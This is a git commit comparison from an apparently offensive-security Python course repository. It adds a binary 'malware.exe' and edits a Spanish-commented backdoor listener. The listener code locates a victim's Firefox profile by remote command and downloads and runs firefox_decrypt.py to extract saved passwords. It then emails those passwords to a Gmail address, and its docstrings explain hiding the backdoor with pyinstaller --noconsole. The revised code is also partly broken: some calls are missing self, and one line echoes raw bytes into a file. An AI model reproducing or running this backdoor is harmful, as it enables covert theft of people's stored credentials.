Compare commits
No commits in common. "0d95645a935275efaa703c19c7965ff444104c8b" and "bcb3977c07eed66e962a47faa38075c9ceabcaa5" have entirely different histories.
0d95645a93
...
bcb3977c07
BIN
python-ofensivo/15_hacking/10_malware/malware.exe
Normal file
BIN
python-ofensivo/15_hacking/10_malware/malware.exe
Normal file
Binary file not shown.
@ -1,11 +1,6 @@
|
||||
# /usr/bin/env python3
|
||||
"""
|
||||
Backdoor
|
||||
|
||||
Para hacerlo invisible se puede usar pyinstaller con la opción --noconsole
|
||||
|
||||
pyinstaller --onefile --noconsole listener.py
|
||||
|
||||
"""
|
||||
|
||||
import signal
|
||||
|
@ -2,20 +2,22 @@
|
||||
"""
|
||||
Listener para el backdoor
|
||||
|
||||
Para hacer invisible el backdoor se puede utilizar pyinstaller con la
|
||||
opción --noconsole
|
||||
Para hacerlo invisible se puede usar pyinstaller con la opción --noconsole
|
||||
|
||||
pyinstaller --onefile --noconsole listener.py
|
||||
|
||||
|
||||
"""
|
||||
|
||||
|
||||
import dotenv
|
||||
import os
|
||||
import requests
|
||||
import signal
|
||||
import smtplib
|
||||
import socket
|
||||
import sys
|
||||
import tempfile
|
||||
from email.mime.text import MIMEText
|
||||
from termcolor import colored
|
||||
|
||||
@ -106,12 +108,12 @@ class Listener:
|
||||
Consigue el profile de firefox
|
||||
"""
|
||||
|
||||
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
|
||||
|
||||
command = f"dir {path}"
|
||||
|
||||
try:
|
||||
|
||||
path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
|
||||
|
||||
command = f"dir {path}"
|
||||
|
||||
output_command_dir = self.execute_remotely(command)
|
||||
|
||||
profile_line = next(line for line in output_command_dir.split(
|
||||
@ -127,32 +129,35 @@ class Listener:
|
||||
|
||||
return None
|
||||
|
||||
|
||||
def get_firefox_passwords(self, username, profiles):
|
||||
"""
|
||||
Extrae las contraseñas guardadas en un profile de firefox
|
||||
"""
|
||||
|
||||
url_download = "https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py"
|
||||
path_download = "%TEMP%\\firefox_decrypt.py"
|
||||
options_download = "/transfer midescarga /download /priority normal"
|
||||
command_download = f"bitsadmin {options_download} {url_download} {path_download}"
|
||||
|
||||
firefox_profile_path = f"C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}"
|
||||
|
||||
try:
|
||||
self.execute_remotely(command_download)
|
||||
command = f"python firefox_decrypt.py {firefox_profile_path}"
|
||||
|
||||
command = f"python %TEMP%\\firefox_decrypt.py {firefox_profile_path}"
|
||||
r = requests.get(
|
||||
"https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py")
|
||||
|
||||
passwords = self.execute_remotely(command)
|
||||
self.execute_remotely(f"dir C:\\Users\\{username}\\AppData\\Local\\Temp\\")
|
||||
print(execute_remotely("dir"))
|
||||
|
||||
self.execute_remotely("del %TEMP%\\firefox_decrypt.py")
|
||||
command_copy = f"echo {r.content} > firefox_decrypt.py"
|
||||
self.execute_remotely(command_copy)
|
||||
temp_dir = tempfile.mkdtemp()
|
||||
|
||||
except Exception as e:
|
||||
os.chdir(temp_dir)
|
||||
|
||||
print(f"\n[!] Error al obtener las contraseñas de Firefox.\nError: {e}")
|
||||
with open("firefox_decrypt.py", "wb") as f:
|
||||
|
||||
return None
|
||||
f.write(r.content)
|
||||
|
||||
passwords = execute_remotely(command)
|
||||
|
||||
os.remove("firefox_decrypt.py")
|
||||
|
||||
return passwords
|
||||
|
||||
@ -205,7 +210,7 @@ class Listener:
|
||||
|
||||
if passwords:
|
||||
|
||||
self.send_email(
|
||||
send_email(
|
||||
"Decrypted Firefox Passwords INFO",
|
||||
passwords,
|
||||
"keyloggerseginf@gmail.com",
|
||||
@ -230,5 +235,5 @@ class Listener:
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
my_listener = Listener("192.168.1.119", 443)
|
||||
my_listener = Listener("192.168.2.105", 443)
|
||||
my_listener.run()
|
||||
|
Loading…
Reference in New Issue
Block a user